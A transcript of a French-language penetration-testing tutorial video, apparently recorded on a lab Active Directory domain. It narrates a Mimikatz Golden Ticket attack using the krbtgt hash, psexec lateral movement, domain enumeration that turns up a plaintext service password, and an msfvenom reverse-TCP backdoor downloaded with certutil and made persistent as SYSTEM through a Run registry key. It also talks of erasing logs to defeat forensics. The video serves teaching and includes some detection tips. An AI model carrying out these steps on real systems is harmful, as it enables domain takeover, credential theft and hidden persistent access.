Donc, maintenant, on va voir l'attaque du Golden Ticket qui est d'or. Je pense que ça fait référence à Willy Wonka dans Charlie et la chocolaterie. Celui qui a le ticket d'or, il peut aller dans la chocolaterie et manger plein de bonbons, plein de chocolat. Voilà, je crois que c'est un petit peu la même chose. Donc, cette fameuse attaque du Golden Ticket. C'est parti. Donc, on va s'ouvrir un terminal. Pop, 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 pop. Donc, comme je fais les vidéos en plusieurs fois, hein, vous inquiétez pas, on change l'adresse IP puisque je redémarre les VM et à chaque fois que la VM redémarre, l'adresse IP change. Voilà, la logique. Donc, on se reconnecte en SSH, la classique, administrator et ma nouvelle adresse IP. Ok, on va dans Download, comme tout à l'heure. On va relancer Mimikatz. Et là, j'ai mon programme Mimikatz. Ok, on est dans Mimikatz. Donc, le Golden Ticket. Cette fois-ci, il nous faut le Privilege Debug. Deux points tout le temps, n'oubliez pas, dans Mimikatz. C'est ce qui permet la séparation des commandes. Donc, on a vu qu'on était en Privilege 20. Pour pouvoir faire l'opération, c'est l'attaque du ticket d'or, il faut qu'on soit en Privilege 20. Si c'est pas le cas, ça va être très très compliqué pour vous. Là, c'est le cas, donc on est tranquille. Donc maintenant, qu'est-ce que je fais? Je vais faire un LSA dump comme tout à l'heure, mais cette fois-ci, on va faire la commande inject et le nom du compte qui nous intéresse. Nous, le compte qui nous intéresse, on veut craquer Kerberos. Le compte Kerberos, c'est KRBTGT. Donc ça va dumper le hash et l'identifiant de sécurité du serveur Kerberos. Et ça va nous permettre de créer un nouveau ticket d'or. Et le ticket d'or va nous permettre de nous connecter et d'usurper les droits sur la machine. Donc c'est parti, LSA, dump. Donc c'est du LSA qu'on veut, comme tout à l'heure. Par contre là, cette fois-ci, c'est inject. Et cette fois-ci, on va mettre le name et on veut RBTGT. Ok, donc ça dump. Bim. On a le primary avec les chiffrements NTLM. On a le digest, donc c'est la forme chiffrée. Il nous dit bien que c'est le compte KRBTGT du compte Kerberos, les clés et le strong avec une random value. Donc nous, si on regarde le primary, on a le primary NTLM. C'est cette clé-là, c'est ce hash. Donc on va utiliser ça et on va se servir de cet ID pour créer grosso modo notre golden ticket. Donc celui-là, je le sélectionne bien, bien prendre tout, pas laisser un espace, sinon ça va compter un caractère. Je fais mon copier. Ok. Maintenant, on va créer le ticket d'or. Donc pour créer le ticket d'or, on va taper la commande Kerberos parce que c'est le service Kerberos qu'on veut usurper. On veut quoi? Un golden. Le user, bah, on veut être administrateur. Attention majuscule. Ensuite, le domaine. Le domaine, on a vu bien avant que le domaine c'est contrôleur.local. Ok. Ensuite, il nous faut le seed. Donc là, on va récupérer notre seed. Et le seed, il se trouve où? Eh ben, on remonte un peu.
Et là, on a notre seed. Ok, j'ai mon seed. Suivi du KRB TGT avec son ID. Donc là, KRB TGT. Ok. Deux points. Je lui mets la clé. Merde, je fais une boulette. Et on lui met son ID. Donc là, il génère le Golden Ticket. Il ajoute au groupe ID. On a un ticket donc qui a une durée de début et de fin, comme tout ticket. Il est signé numériquement par le serveur Kerberos. Donc là, au lieu de mettre authentifié en tant qu'utilisateur valide, avoir demandé au service d'énumération de me créer une clé de chiffrement pour pouvoir m'authentifier au KS, au serveur, au KC, pardon, au KSC, au serveur Kerberos, qui lui-même m'aurait généré le ticket TGT, le Golden Ticket permet de s'affranchir de tout ça. Et il nous dit qu'il a sauvegardé, pardon, le fichier final. Donc là, on est bon. Maintenant, il va falloir utiliser ce ticket pour accéder à une autre machine. Donc on va utiliser MISC command CMD et ça va ouvrir un nouveau cmd.exe, ligne de commande, avec des privilèges élevés sur toutes les machines. Donc là, on fait notre MISC, notre CMD, pas de choquer, CMD, disable CMD, Kiwi. Donc Kiwi, c'est le noyau de c'est pour ça qu'il y a des kiwis, de Mimikatz. Mimikatz et un kiwi, bah, c'est un peu comme le gothique que je vous ai montré tout à l'heure. On va rentrer par le noyau. Donc ça, c'est fait. Maintenant, bah, il faut accéder aux autres machines. Donc là, le réseau n'est pas activé sur, comment dire, sur la machine TryAcme. Donc on peut pas y accéder, mais en principe, on va ajouter d'autres machines au contrôleur de domaine et on va pouvoir attaquer ces machines avec le Golden Ticket.
Je vais vous montrer une commande. On va voir si ça passe. Je vais me remettre dans le CD download. On voit que là, on a mon golden ticket qui est apparu. Et je vais pouvoir m'en servir. Et on peut faire un ps exec. Ah, il n'est pas installé. Mais en gros, je vais vous montrer. Pardon. Voilà. Ensuite, avec psexec, une fois que c'est uploadé sur la machine, en fait, vous faites la commande psexec.exe slash anti-slash, enfin anti-slash, ça se dit pas, reverse slash, je sais même plus comment ils disent les anglais. Anti-slash, ils aiment pas. Moi, je dis tout le temps anti-slash, mais c'est pas ça qu'ils veulent. C'est un néologisme que je me reprenne, barre oblique inversée, contre oblique. Bon, c'est vrai que j'utilise, ouais, un backslash, pardon. Donc, revenons à nos moutons. On tape le nom de la machine qu'on veut et le cmd.exe. Et en fait, il va se servir du ticket Kerberos pour pouvoir accéder aux différentes machines en tant qu'administrateur. En gros, vous allez émuler une nouvelle session ligne de commande dans la ligne de commande actuelle et vous allez pouvoir pivoter d'une machine à l'autre. Ça va être super utile puisque vous pourrez modifier les droits sur la machine, vous pourrez copier des fichiers et jongler, pivoter d'une machine à une autre, soit avec le bureau à distance, soit en ligne de commande. Donc voilà, ça c'était la partie Golden Ticket. Maintenant, on va passer à la partie énumération. Donc là, on va utiliser en fait les outils classiques. C'est le dashboard que je vous avais montré. Et on va s'en servir pour faire du renseignement. Donc, le dashboard, ça vous permet de faire aussi de l'énumération, d'avoir des informations. Très souvent sur les serveurs, il y a de la log qui va nous permettre de comprendre un petit peu mieux ce qui passe, quels sont les services qui tournent et quels sont les droits, les fameuses ACL, les règles les polices de sécurité qui tournent aussi sur la machine et qu'on va pouvoir usurper. Mais à partir de là aussi, on peut modifier donc les domaines de confiance. On peut effacer ou ajouter des utilisateurs. On peut regarder quels sont les utilisateurs qui sont présents dans un groupe spécifique. Et ça va être notre point d'entrée pour récupérer des informations sensibles sur les machines ou sur le contrôleur de domaine ou faire un pivotage qui va nous permettre d'accéder à une autre partie segmentée du réseau auquel on n'aurait pas eu avant. Donc tout l'avantage de maîtriser la gestion aussi des consoles sur du Windows Server, Windows Manager, pour pouvoir tirer profit de tous les outils d'administration qui sont disponibles sur le serveur Windows pour pouvoir tracer notre chemin vers les cibles de haute valeur. Donc on va voir comment on peut regarder les utilisateurs, les groupes, les domaines de confiance, et on va faire de l'énumération tranquillement via la console, le dashboard. Donc, on va se connecter cette fois-ci, on va lâcher le SSH. Et on va lancer une petite session avec nos R desktop. Hop là, donc R desktop. J'ai, on va faire un slash F même. Ça va vous montrer, ça fait du full screen. Comme ça, on sera plus à l'aise. User. Donc, on veut être administrateur. P, on veut le password. Le password, c'était, bah, on tourne dessus, hein. Non, je fais des bêtises. Voilà. Et
Et il nous a effacé l'adresse de la machine, cet enfoiré. Yes. Donc, avec le tiret F, vous voyez que vous êtes en plein écran. C'est beaucoup plus facile que le tiret G 90%. Donc là, il tape pas sur le domaine par défaut. Donc, j'aurais pu mettre l'argument tiret domaine pour accéder directement à la machine sans passer par la mire. Mais là, je l'ai pas fait. Ok. Donc, par défaut, quand vous arrivez sur le Windows Server Manager, sur le Windows Server, pardon, il vous ouvre le dashboard automatiquement. Donc, je vous ai dit, on va aller dans l'Active Directory. Vas-y, mais casse-toi là, putain, m'énerve ça. Donc, tout le tab. Ah, je suis vraiment désolé. Je sais pas si c'est leur serveur ou ma connexion qui fatigue. Mais bon, on veut User Computer. Ok. Donc ça va être un peu long. Ça mouline sec. Ok. Donc, on arrive sur cette fenêtre. Donc, ça permet d'avoir tous les utilisateurs du domaine et aussi d'autres onglets qui permettent de récupérer pas mal d'informations quand on fait de la reco, de l'énumération. On regarde là s'il n'y a pas de sous-arborescence. Il n'y a pas de souci. Donc, très souvent, les sysadmins, les administrateurs système, sous-estiment le fait qu'un attaquant peut faire du recueil d'informations et avoir beaucoup d'informations pertinentes par rapport vis-à-vis de juste des simples informations qui sont dans l'Active Directory, dans la console de gestion. Là, on voit que l'administrateur a été assez débile pour mettre en description du service, du compte utilisateur SQL, le mot de passe. Donc ne rigolez pas, il faut savoir que il y a plein d'administrateurs système qui font ça, qui se mettent des penses bêtes, ou j'ai déjà vu, honnêtement, je vais pas vous mentir, quand vous allez sur le bureau, il y a l'application qui permet de mettre des penses bêtes là, comme un post-it, et il y a tous les mots de passe avec les adresses IP et les noms de machines sur le groupe de travail. Je vous assure que j'ai déjà vu ça. Donc là, on voit qu'on peut accéder à l'ensemble des onglets. Je vais pas trop rentrer dans le détail parce que c'est pas le but de l'exercice, mais vous voyez bien que on peut se balader, regarder dans les groupes. Ok, il y a quoi dans les groupes? Qu'est-ce que c'est lent? Ok, reviens, reviens, reviens. Donc on voit là qu'on accède à les différents groupes. On peut gérer les comptes de service, les contrôleurs de domaine, voir les ordinateurs qui sont connectés. Donc ça permet de faire pas mal de choses, comme on peut le voir. On voit nos deux desktops avec, si on veut, on va faire un exemple, on va s'amuser. Ok, donc on a l'operating system, on voit que c'est bien nos Windows 10.
peux ajouter, si j'ai envie, eh ben, des utilisateurs, faire de la délégation, changer même le réglage du Kerberos. Bon là, c'est pas de chance, mais des fois même, on a même le nom de la personne, quel bureau il travaille, on a l'adresse, parce que des fois dans certaines grosses entreprises, tout est enregistré. Et on peut ouvrir, accéder aux permissions du réseau, faire un hollow access par exemple, pour accéder à la machine, sans problème. Donc on voit qu'on peut modifier les paramétrages en temps réel, c'est plutôt utile. Donc, bah, il nous demande par exemple dans user quel est le mot de passe de SQL? Bah, le mot de passe SQL, c'est mypassword 123 dièse. Donc là, il n'y a pas besoin d'aller chercher très loin. Donc vous voyez que vous pouvez en fait donc accéder à beaucoup d'informations. Je vous avais montré brièvement, mais dans Tool, vous avez l'ensemble des trucs. Vous avez par exemple on peut voir le système, il est où? Voilà, l'event viewer. Là, on a l'observateur d'événements. Et donc, pour rappel, ça va nous permettre de regarder tous les problèmes, tout ce qui s'est passé, ce qui s'est déroulé avec les codes d'erreur sur une machine. Ça vous permet notamment sur votre machine Windows de savoir que vous avez été piraté. Sauf si le hacker est assez intelligent et a effacé toutes les logs. Dans ce cas-là, vous l'aurez dans l'os. Mais on peut regarder les logs de sécurité. Voilà, je vais voir sécurité. Et là, on va voir tout ce qui concerne la sécurité sur le contrôleur de domaine. Voilà. Donc là, on a vu qu'on a un logon, on a eu un logoff. C'est sûrement nous qui nous sommes connectés et on peut voir les différentes permissions. Donc, si jamais un jour sur votre machine, vous voyez un audit success avec un compte utilisateur qui a été créé et qui n'est pas le vôtre, ou qui s'est connecté à une heure sur laquelle vous n'étiez pas sur votre PC, c'est qu'il y a de fortes chances que vous vous êtes fait pirater. Donc il y a les special login aussi. Généralement ça c'est des services. Et donc on peut aller après regarder en détail qui fait quoi, qu'est-ce qui s'est passé. D'où l'important d'étudier les logs, surtout en entreprise, pour comprendre ce qui s'est passé. Et on voit les fameux privilèges qu'on peut usurper. Donc faites attention, quand vous voyez un NT Authority, ça peut être très bien un service Windows qui s'est connecté avec les droits parce qu'il y a une tâche planifiée dans Windows ou sur le serveur Windows, mais ça peut être très bien un pirate qui vous a hacké. Ça après, c'est avec le temps, l'expérience, que vous arrivez à faire le tri là-dessus. Donc maintenant, on va voir le maintien d'accès, donc vraiment la composante, allez vous renseigner, comprendre ce que c'est l'Active Directory, le service d'un URL DAP, comment on gère les GPO, comment on gère les ACL. Tout ça, c'est absolument à connaître si un jour vous voulez être administrateur système sur du Windows, sur une plateforme Windows. Parce que ce sont des bases et c'est ce que vous manipulerez au quotidien pour octroyer, pour retirer des droits sur des machines, à des services, à des utilisateurs. Donc, vous voyez que le PowerShell aussi, c'est puissant. Ça permet de faire plein de choses. Je vous conseille d'apprendre le PowerShell. Et faites les choses calmement, prenez le temps. Et surtout, n'hésitez pas à aller voir tous les cours qui sont disponibles sur Internet. Vous avez d'excellentes bonnes chaînes YouTube. Je ferai un de ces quatre. J'ai plus de 1000 chaînes en abonnement sur mon compte YouTube. Je vous ferai une bonne selecta. Malheureusement de chaînes américaines, anglo-saxonnes, anglaises, parce que les Français, honnêtement, il y a très bonnes petites chaînes, il y a des grosses chaînes, genre les Micode, les Hack Process, mais pour moi, ils font pas vraiment des tests d'intrusion, c'est plus de la vulgarisation grand public. D'ailleurs, ils font jamais des vidéos comme moi là je viens de faire, d'une heure et demie,
pour vous expliquer les choses. Si vous voulez voir un petit peu, et il a un niveau moyen, on va dire, mais je l'aime beaucoup, c'est mon ami, un hacker en train de hacker. Allez le voir, j'ai oublié son blaze, j'espère qu'il m'excusera, mais tapez dans YouTube un hacker en train de hacker. Il fait beaucoup de CTF et il prend le temps de vous expliquer. Donc franchement, je vous ferai une petite sélecta de chaînes YouTube à aller voir. Euh, mais voilà. Allez le donc attends. Ouais, voilà. C'est Farbroti. Donc sa chaîne c'est Chaos Farboti IBN Oblivion. Allez le voir, il est plutôt pas mal, il fait des bons petits trucs, il a un niveau moyen, on va dire, un peu comme le mien. Et il fait des CTF à Google tous les jours, donc abonnez-vous à sa chaîne. Si vraiment vous voulez comprendre plus sur les tests d'intrusion, c'est bien de voir une personne faire ça en live. C'est des lives généralement une heure et demie. Vous faites un petit café, un verre de whisky, un pet, faites ce que vous voulez, vous vous mettez bien devant sa chaîne et vous regardez comment il est chaud et parfois comment il réussit à pirater la machine. Voilà. Mais c'est un bon gars, je l'aime beaucoup, il a pas la grosse tête et voilà. S'il y a la première chaîne à vous conseiller, c'est bien lui, c'est Chaos Oblivion. Allez le voir sur YouTube. Et je crois qu'il stream aussi sur Twitch. Bon, petit aparté, on va se barrer de là et maintenant on va taper et faire notre persistance. Donc la persistance, pour rappel, c'est le maintien d'accès. J'ai piraté l'ensemble du système. Maintenant, je veux installer un backdoor, une porte dérobée, pour que ça soit GOTY. Donc, il y a plusieurs façons de maintenir un accès sur une machine ou sur un réseau. Euh, Il y a une partie qu'on va pas voir là, mais c'est comment effacer toutes ces traces. Parce que, comme vous avez vu, si l'administrateur va sur le contrôleur de domaine et lance l'event viewer, il va voir que on a fait un golden ticket, qu'on a réussi à accéder à des heures impromptues au serveur, et il va se dire, oula, je crois qu'il y a un pirate qui est passé. Par contre, si on efface l'ensemble des logs, à moins que les logs soient reroutés vers un autre serveur de logs, ce qui est aussi possible. Dans ce cas-là, il faudra faire plus d'actions, mais on peut effacer toutes nos traces, tout ce qu'on a fait. Et on verra dans une future vidéo comment effacer ces traces sur une machine Unix, Linux, comment effacer ces traces sur une machine Windows ou une machine Windows Server, pour que on ne puisse pas faire de forensique. Le forensique, c'est l'analyse informatique pour essayer de retrouver des preuves du crime. Et le crime, c'est quoi? C'est que un méchant hacker s'est connecté au serveur. Il aurait pas dû. Il doit aller en prison et payer son prix à la société. Ok, see you soon, motherfucker. Ok, donc on va générer une charge utile virale metteur-prêteur et on va lui demander un reverse TCP. Donc, bah classique, hein, sudo MSF Venom. Donc MSF Venom qui est le module qui permet de créer des charges, des virus, des charges utiles. Faut arrêter de boire, Marco. Donc -p, plateforme, comme d'habitude, c'est du Windows. On veut un metteur-prêteur et on veut un reverse TCP. Là, je mets mon lhost comme d'habitude. Donc c'est 10, c'est 10, 8, 17, 230 à remplacer par votre VPN. Donc le tune 0 dans ifconfig pour vous. Le port, ben on va prendre un port bâtard, on va pas se prendre la tête. On va prendre du 5.4. Allez. Le format, bah ça sera en fichier exe, pour cet exemple. Et l'output, on va se sortir un truc qui s'appelle porte dérobé.exe.
Euh, donc, on va voir la dernière partie. Maintenant, on a bien notre part dérobée.exe, comme son nom l'indique. On va lui donner les droits quand même. On va faire un sudo chmod 7777 sur porte dérobée. On fait un là et on voit que on a bien les droits pour les trois utilisateurs. Le root, saltimbanque et un autre other utilisateur. En l'occurrence, on veut être sûr qu'on n'aura pas de problème de droit à l'exécution du fichier sur la machine. Voilà, ça vous permet de déporter la charge de travail, le crack, et vous allez directement rentrer le hash, voilà, et vous faites submit as search, vous avez juste à remplir un captcha et ça va vous craquer via leur serveur. Donc si vous avez un petit PC, ça peut être sympa d'utiliser ce service. D'ailleurs, je vais le rajouter encore dans mes favoris. Ok, sudo python 3 m m euh, Python 3, ouais, HTTP serveur port 80. Ok, je retourne sur la machine. Search utile. Dyslexique, dyslexique. Donc on est sur le contrôleur de domaine. Search utile. Error cache. C'est l'argument F, j'espère. HTTP 2.10 10 10 8 17 230. Ok, port 80. Là, on veut récupérer porte dérobée.exe et on veut qu'il s'appelle on va faire ça en backdoor.exe. Got you, motherfucker. Ok, backdoor.exe est exécuté sur la machine. Maintenant, MSF console, c'est parti. Donc là, je vais faire un set. On veut notre payload, on va le définir, on veut du Windows. Ok, le petit show options des familles. Ah, je suis vraiment désolé, quoi. Je suis fatigué de chez fatigué, quoi. Il faut d'abord choisir l'export, on veut un multi-handler. Non, c'est bon, vas-y, casse-toi. Ok, il a pris le payload. On n'a pas besoin de le définir. On va juste éditer les variables. Donc, port 4444. Ouais, sauf que moi, tout à l'heure, j'ai fait quoi? J'ai fait 5553. 5554. Je crois que c'était. 7 L porte. 5554.
et set lhost, on se fait pas chier, on met notre thune 0, comme ça on n'a pas besoin de définir l'adresse IP, il la trouve tout seul. Une fois que c'est fait, on va lancer le multi-handler via la command run. Et là, il écoute sur le port 5554. Ensuite, je regarde, je retourne sur ma machine. Là, j'exécute mon backdoor. Le stage arrive. Ok, on est dans la boîte. Donc on a exécuté le binaire sur la machine qui nous permet de récupérer la session metteur-prêteur. Est-ce qu'on peut peut-être faire un shell? Allô? Ok. Donc on est bien administrateur, il veut bien nous créer un shell, c'est parfait, on a accès. Ça a pris un peu de temps. Donc là, ce qu'on va faire, on va faire un CTRL-C, Y. Donc, et dans metteur-prêteur, on va faire en fait background. Donc là, ça met en tâche de fond la session 1. Maintenant, on va utiliser le module persistance. Pour ce faire, on va faire use, exploit, Windows, local. Allez. Use, exploit, donc, persistance. Voilà. Donc en fait, qu'est-ce que fait ce module? Ce module local persistance, show options, envoie à intervalles réguliers. Donc voilà, là on va lui demander tous les 10 secondes. Ça va réenvoyer le stage A. Donc la première charge initiale qui permet de récupérer la connexion. Donc toutes les 10 secondes, tant que ça sera ouvert, on enverra des paquets réseau vers la machine qui lui diront ouvre la backdoor, ouvre la backdoor, salut, ouvre la backdoor. Et si l'ordinateur est démarré et en ligne, il va faire OK, je t'ouvre la backdoor. OK, je t'ouvre la backdoor. OK, je t'ouvre la backdoor. Ça permet de maintenir une communication ininterrompue sur la machine. Donc là, on va lui mettre on va lui mettre la session et on va lui mettre aussi, on va définir un petit peu, euh, comment dire, on va définir toutes les variables qui vont nous permettre d'exploiter tout ça. Donc le lhost, non, nous on a dit qu'on fait un set lport sur le 554, on veut notre set lhost, on va redéfinir, on veut sur du tune 0, c'est la machine du hacker. Ah putain. Ok. Ensuite, qu'est-ce qu'il nous faut? On a le délai, la session. Vous vous rappelez, on vient de mettre en tâche de fond la session 1. Donc on va faire un set session 1. Et là, je crois qu'on est bon. Startup user, persistent payload. Alors oui, on peut choisir de démarrer en tant qu'utilisateur ou tant que système. Là, on a vu qu'on a un accès admin, on va en profiter. On va le faire démarrer en tant que système. Ça sera encore plus vicieux. Donc set startup système. Vu qu'on est NT Authority System, autant en profiter et ça camouflera d'autant plus notre porte dérobée au sein du système. Et là, maintenant, un petit run des familles. Et là, il va injecter
la persistance sur le contrôleur de domaine via la session 1. Voilà. Il a créé un script VBS. Il a ajouté une clé de registre qui se trouve dans Software Microsoft Current 1. Et c'est pareil, je vous conseille sur votre Windows de vous balader dans HKLM Software Microsoft Windows Current Version Run et à regarder s'il n'y a pas une clé qui m'a l'air un petit peu bizarre. Si c'est le cas, vous êtes fait pirater. Félicitations. Et en plus, ça installe un autorun. Donc, à chaque fois que la machine redémarre, l'autorun se lance, charge la clé qui est présente ici, et on a un script, au pire des cas, secondaire, qui s'exécute dans le fichier temporaire. Et ça nous donne un interpréteur en RC4 qui est installé. Donc là, en gros, si le système s'arrête ou redémarre, je peux à tout moment, grâce au module de persistance, créer à nouveau une porte dérobée et me connecter via un multi-handler de Metasploit au système en utilisant le Windows Interpreter Reverse TCP. Donc, un exemple, comment je peux faire? Imaginons que je fasse session. OK? Donc voilà, ouais, je fais un exit Y. OK, je relance MSF console. Et grâce à la persistance, je récupère ma session qui a été fermée ou si l'ordinateur a redémarré, je peux récupérer ma connexion.